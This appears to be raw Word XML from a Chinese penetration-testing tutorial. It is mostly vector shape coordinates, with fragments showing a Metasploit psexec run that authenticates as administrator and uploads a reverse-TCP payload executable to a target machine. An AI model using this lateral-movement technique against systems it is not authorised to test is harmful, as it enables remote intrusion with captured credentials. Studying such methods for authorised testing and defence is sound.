6,12396,4826,12400,4826,12404,4826,12408,4826,12413,4826,12417,4826,12422,4826,12426,4826,12431,4826,12436,4826,12440,4826,12445,4826,12451,4826,12456,4826,12461,4826,12466,4826,12472,4826,12477,4826,12483,4826,12489,4826,12494,4826,12500,4826,12507,4826,12513,4826,12519,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4826,12525,4825,12525,4825,12525,4825,12525,4825,12525,4825,12525,4825,12525,4825,12525,4824,12525,4824,12525,4824,12525,4824,12525,4823,12525,4823,12525,4823,12525,4823,12525,4822,12525,4822,12525,4822,12525,4821,12525,4821,12525,4820,12525,4820,12525,4819,12525,4819,12525,4819,12525,4818,12525,4818,12525,4817,12525,4816,12525,4816,12525,4815,12525,4815,12525,4814,12525,4813,12525,4813,12525,4812,12525,4811,12525,4810,12525,4809,12525,4809,12525,4808,12525,4807,12525,4806,12525,4805,12525,4804,12525,4803,12525,4802,12525,4801,12525,4800,12525,4799,12525,4798,12525,4796,12525,4795,12525,4794,12525,4793,12525,4791,12525,4790,12525,4789,12525,4787,12525,4786,12525,4784,12525,4783,12525,4781,12525,4780,12525,4778,12525,4776,12525,4774,12525,4773,12525,4771,12525,4769,12525,4767,12525,4765,12525,4763,12525,4761,12525,4759,12525,4757,12525,4755,12525,4753,12525,4751,12525,4749,12525,4746,12525,4744,12525,4742,12525,4739,12525,4737,12525,4734,12525,4732,12525,4729,12525,4726,12525,4724,12525,4721,12525,4718,12525,4715,12525,4712,12525,4709,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12525,4706,12524,4706,12524,4706,12524,4706,12524,4706,12524,4706,12523,4706,12523,4706,12523,4706,12523,4706,12522,4706,12522,4706,12522,4706,12521,4706,12521,4706,12520,4706,12520,4706,12519,4706,12519,4706,12518,4706,12518,4706,12517,4706,12516,4706,12516,4706,12515,4706,12514,4706,12513,4706,12512,4706,12512,4706,12511,4706,12510,4706,12509,4706,12508,4706,12506,4706,12505,4706,12504,4706,12503,4706,12501,4706,12500,4706,12499,4706,12497,4706,12496,4706,12494,4706,12493,4706,12491,4706,12489,4706,12487,4706,12486,4706,12484,4706,12482,4706,12480,4706,12478,4706,12476,4706,12473,4706,12471,4706,12469,4706,12466,4706,12464,4706,12461,4706,12459,4706,12456,4706,12453,4706,12451,4706,12448,4706,12445,4706,12442,4706,12439,4706,12436,4706,12432,4706,12429,4706,12426,4706,12422,4706,12419,4706,12415,4706,12411,4706,12407,4706,12404,4706,12400,4706,12396,4706,12391,4706,12387,4706,12383,4706,12378,4706,12374,4706,12369,4706,12365,4706,12360,4706,12355,4706,12350,4706,12345,4706,12340,4706,12335,4706,12329,4706,12324,4706,12318,4706,12313,4706,12307,4706,12301,4706,12295,4706,12289,4706,12283,4706,12277,4706,12270e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:631.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,12630" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:12630;width:130;height:270" coordorigin="2170,12630" coordsize="130,270" path="m2185,12645l2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2185,12645,2186,12645,2186,12645,2186,12645,2186,12645,2186,12645,2186,12645,2186,12645,2186,12645,2186,12645,2187,12645,2187,12645,2187,12645,2187,12645,2187,12645,2187,12645,2188,12645,2188,12645,2188,12645,2188,12645,2189,12645,2189,12645,2189,12645,2190,12645,2190,12645,2190,12645,2191,12645,2191,12645,2192,12645,2192,12645,2192,12645,2193,12645,2193,12645,2194,12645,2195,12645,2195,12645,2196,12645,2196,12645,2197,12645,2198,12645,2198,12645,2199,12645,2200,12645,2200,12645,2201,12645,2202,12645,2203,12645,2204,12645,2205,12645,2206,12645,2207,12645,2208,12645,2209,12645,2210,12645,2211,12645,2212,12645,2213,12645,2214,12645,2215,12645,2216,12645,2218,12645,2219,12645,2220,12645,2222,12645,2223,12645,2224,12645,2226,12645,2227,12645,2229,12645,2230,12645,2232,12645,2234,12645,2235,12645,2237,12645,2239,12645,2241,12645,2242,12645,2244,12645,2246,12645,2248,12645,2250,12645,2252,12645,2254,12645,2256,12645,2259,12645,2261,12645,2263,12645,2265,12645,2268,12645,2270,12645,2272,12645,2275,12645,2277,12645,2280,12645,2283,12645,2285,12645,2288,12645,2291,12645,2293,12645,2296,12645,2299,12645,2302,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12645,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12646,2305,12647,2305,12647,2305,12647,2305,12647,2305,12647,2305,12648,2305,12648,2305,12648,2305,12649,2305,12649,2305,12649,2305,12650,2305,12650,2305,12651,2305,12651,2305,12652,2305,12652,2305,12653,2305,12654,2305,12654,2305,12655,2305,12656,2305,12657,2305,12657,2305,12658,2305,12659,2305,12660,2305,12661,2305,12662,2305,12663,2305,12664,2305,12665,2305,12667,2305,12668,2305,12669,2305,12671,2305,12672,2305,12673,2305,12675,2305,12676,2305,12678,2305,12680,2305,12681,2305,12683,2305,12685,2305,12687,2305,12689,2305,12691,2305,12693,2305,12695,2305,12697,2305,12700,2305,12702,2305,12704,2305,12707,2305,12709,2305,12712,2305,12714,2305,12717,2305,12720,2305,12723,2305,12726,2305,12729,2305,12732,2305,12735,2305,12738,2305,12742,2305,12745,2305,12749,2305,12752,2305,12756,2305,12759,2305,12763,2305,12767,2305,12771,2305,12775,2305,12779,2305,12784,2305,12788,2305,12792,2305,12797,2305,12801,2305,12806,2305,12811,2305,12816,2305,12821,2305,12826,2305,12831,2305,12836,2305,12841,2305,12847,2305,12852,2305,12858,2305,12864,2305,12870,2305,12876,2305,12882,2305,12888,2305,12894,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2305,12901,2304,12901,2304,12901,2304,12901,2304,12901,2304,12901,2304,12901,2304,12901,2303,12901,2303,12901,2303,12900,2303,12901,2303,12900,2302,12901,2302,12900,2302,12901,2302,12900,2301,12901,2301,12900,2301,12901,2300,12900,2300,12901,2299,12900,2299,12901,2299,12900,2298,12901,2298,12900,2297,12901,2297,12900,2296,12901,2296,12900,2295,12901,2295,12900,2294,12901,2293,12900,2293,12901,2292,12900,2291,12901,2291,12900,2290,12901,2289,12901,2288,12901,2287,12901,2286,12901,2286,12901,2285,12901,2284,12901,2283,12901,2282,12901,2281,12901,2280,12901,2279,12901,2277,12901,2276,12901,2275,12901,2274,12901,2273,12901,2271,12901,2270,12901,2269,12901,2267,12901,2266,12901,2264,12901,2263,12901,2261,12901,2260,12901,2258,12901,2257,12901,2255,12901,2253,12901,2251,12901,2250,12901,2248,12901,2246,12901,2244,12901,2242,12901,2240,12901,2238,12901,2236,12901,2234,12901,2232,12901,2230,12901,2227,12901,2225,12901,2223,12901,2220,12901,2218,12901,2215,12901,2213,12901,2210,12901,2208,12901,2205,12901,2202,12901,2200,12901,2197,12901,2194,12901,2191,12901,2188,12901,2185,12901,2185,12901,2185,12901,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12900,2185,12899,2185,12899,2185,12899,2185,12899,2185,12899,2185,12898,2185,12898,2185,12898,2185,12898,2185,12897,2185,12897,2185,12896,2185,12896,2185,12896,2185,12895,2185,12895,2185,12894,2185,12893,2185,12893,2185,12892,2185,12892,2185,12891,2185,12890,2185,12889,2185,12888,2185,12888,2185,12887,2185,12886,2185,12885,2185,12884,2185,12883,2185,12882,2185,12880,2185,12879,2185,12878,2185,12877,2185,12875,2185,12874,2185,12872,2185,12871,2185,12869,2185,12868,2185,12866,2185,12864,2185,12863,2185,12861,2185,12859,2185,12857,2185,12855,2185,12853,2185,12851,2185,12849,2185,12846,2185,12844,2185,12842,2185,12839,2185,12837,2185,12834,2185,12831,2185,12829,2185,12826,2185,12823,2185,12820,2185,12817,2185,12814,2185,12811,2185,12808,2185,12804,2185,12801,2185,12797,2185,12794,2185,12790,2185,12786,2185,12783,2185,12779,2185,12775,2185,12771,2185,12767,2185,12762,2185,12758,2185,12754,2185,12749,2185,12745,2185,12740,2185,12735,2185,12730,2185,12725,2185,12720,2185,12715,2185,12710,2185,12704,2185,12699,2185,12693,2185,12688,2185,12682,2185,12676,2185,12670,2185,12664,2185,12658,2185,12652,2185,12645e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.500pt;margin-top:631.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4690,12630" coordsize="130,270">
        <v:shape style="position:absolute;left:4690;top:12630;width:130;height:270" coordorigin="4690,12630" coordsize="130,270" path="m4706,12645l4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4706,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4707,12645,4708,12645,4708,12645,4708,12645,4708,12645,4708,12645,4708,12645,4709,12645,4709,12645,4709,12645,4709,12645,4710,12645,4710,12645,4710,12645,4711,12645,4711,12645,4711,12645,4712,12645,4712,12645,4712,12645,4713,12645,4713,12645,4714,12645,4714,12645,4715,12645,4715,12645,4716,12645,4716,12645,4717,12645,4718,12645,4718,12645,4719,12645,4720,12645,4720,12645,4721,12645,4722,12645,4723,12645,4723,12645,4724,12645,4725,12645,4726,12645,4727,12645,4728,12645,4729,12645,4730,12645,4731,12645,4732,12645,4733,12645,4734,12645,4735,12645,4736,12645,4738,12645,4739,12645,4740,12645,4741,12645,4743,12645,4744,12645,4746,12645,4747,12645,4749,12645,4750,12645,4752,12645,4753,12645,4755,12645,4757,12645,4758,12645,4760,12645,4762,12645,4764,12645,4766,12645,4767,12645,4769,12645,4771,12645,4773,12645,4776,12645,4778,12645,4780,12645,4782,12645,4784,12645,4787,12645,4789,12645,4791,12645,4794,12645,4796,12645,4799,12645,4801,12645,4804,12645,4806,12645,4809,12645,4812,12645,4815,12645,4818,12645,4820,12645,4823,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12645,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12646,4826,12647,4826,12647,4826,12647,4826,12647,4826,12647,4826,12648,4826,12648,4826,12648,4826,12649,4826,12649,4826,12649,4826,12650,4826,12650,4826,12651,4826,12651,4826,12652,4826,12652,4826,12653,4826,12654,4826,12654,4826,12655,4826,12656,4826,12657,4826,12657,4826,12658,4826,12659,4826,12660,4826,12661,4826,12662,4826,12663,4826,12664,4826,12665,4826,12667,4826,12668,4826,12669,4826,12671,4826,12672,4826,12673,4826,12675,4826,12676,4826,12678,4826,12680,4826,12681,4826,12683,4826,12685,4826,12687,4826,12689,4826,12691,4826,12693,4826,12695,4826,12697,4826,12700,4826,12702,4826,12704,4826,12707,4826,12709,4826,12712,4826,12714,4826,12717,4826,12720,4826,12723,4826,12726,4826,12729,4826,12732,4826,12735,4826,12738,4826,12742,4826,12745,4826,12749,4826,12752,4826,12756,4826,12759,4826,12763,4826,12767,4826,12771,4826,12775,4826,12779,4826,12784,4826,12788,4826,12792,4826,12797,4826,12801,4826,12806,4826,12811,4826,12816,4826,12821,4826,12826,4826,12831,4826,12836,4826,12841,4826,12847,4826,12852,4826,12858,4826,12864,4826,12870,4826,12876,4826,12882,4826,12888,4826,12894,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4824,12900,4824,12901,4824,12900,4824,12901,4823,12900,4823,12901,4823,12900,4823,12901,4822,12900,4822,12901,4822,12900,4821,12901,4821,12900,4820,12901,4820,12900,4819,12901,4819,12900,4819,12901,4818,12900,4818,12901,4817,12900,4816,12901,4816,12900,4815,12901,4815,12900,4814,12901,4813,12900,4813,12901,4812,12900,4811,12901,4810,12901,4809,12901,4809,12901,4808,12901,4807,12901,4806,12901,4805,12901,4804,12901,4803,12901,4802,12901,4801,12901,4800,12901,4799,12901,4798,12901,4796,12901,4795,12901,4794,12901,4793,12901,4791,12901,4790,12901,4789,12901,4787,12901,4786,12901,4784,12901,4783,12901,4781,12901,4780,12901,4778,12901,4776,12901,4774,12901,4773,12901,4771,12901,4769,12901,4767,12901,4765,12901,4763,12901,4761,12901,4759,12901,4757,12901,4755,12901,4753,12901,4751,12901,4749,12901,4746,12901,4744,12901,4742,12901,4739,12901,4737,12901,4734,12901,4732,12901,4729,12901,4726,12901,4724,12901,4721,12901,4718,12901,4715,12901,4712,12901,4709,12901,4706,12901,4706,12901,4706,12901,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12899,4706,12899,4706,12899,4706,12899,4706,12899,4706,12898,4706,12898,4706,12898,4706,12898,4706,12897,4706,12897,4706,12896,4706,12896,4706,12896,4706,12895,4706,12895,4706,12894,4706,12893,4706,12893,4706,12892,4706,12892,4706,12891,4706,12890,4706,12889,4706,12888,4706,12888,4706,12887,4706,12886,4706,12885,4706,12884,4706,12883,4706,12882,4706,12880,4706,12879,4706,12878,4706,12877,4706,12875,4706,12874,4706,12872,4706,12871,4706,12869,4706,12868,4706,12866,4706,12864,4706,12863,4706,12861,4706,12859,4706,12857,4706,12855,4706,12853,4706,12851,4706,12849,4706,12846,4706,12844,4706,12842,4706,12839,4706,12837,4706,12834,4706,12831,4706,12829,4706,12826,4706,12823,4706,12820,4706,12817,4706,12814,4706,12811,4706,12808,4706,12804,4706,12801,4706,12797,4706,12794,4706,12790,4706,12786,4706,12783,4706,12779,4706,12775,4706,12771,4706,12767,4706,12762,4706,12758,4706,12754,4706,12749,4706,12745,4706,12740,4706,12735,4706,12730,4706,12725,4706,12720,4706,12715,4706,12710,4706,12704,4706,12699,4706,12693,4706,12688,4706,12682,4706,12676,4706,12670,4706,12664,4706,12658,4706,12652,4706,1264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同样可以配合target的改变来解决控制管理器的强制命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接收。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击机设置：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3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targets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791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targets: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Automatic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PowerShell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Native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upload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MOF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upload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2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8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psexec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Authenticating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'a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dministrator'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Uploading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kKwZpPRs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custom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www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html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bin_tcp_x86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_53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exe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RHOST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will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ignored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Created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\kKwZpPRs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Unable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remove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ERROR_CODE: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failed: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RubySMB::Error::UnexpectedStat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usCode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STATUS_PIPE_EMPTY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but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was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created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17.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:226.800pt;width:266.399pt;height:95.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:433.200pt;width:7.200pt;height:7.8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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机：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在执行payloa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d即可。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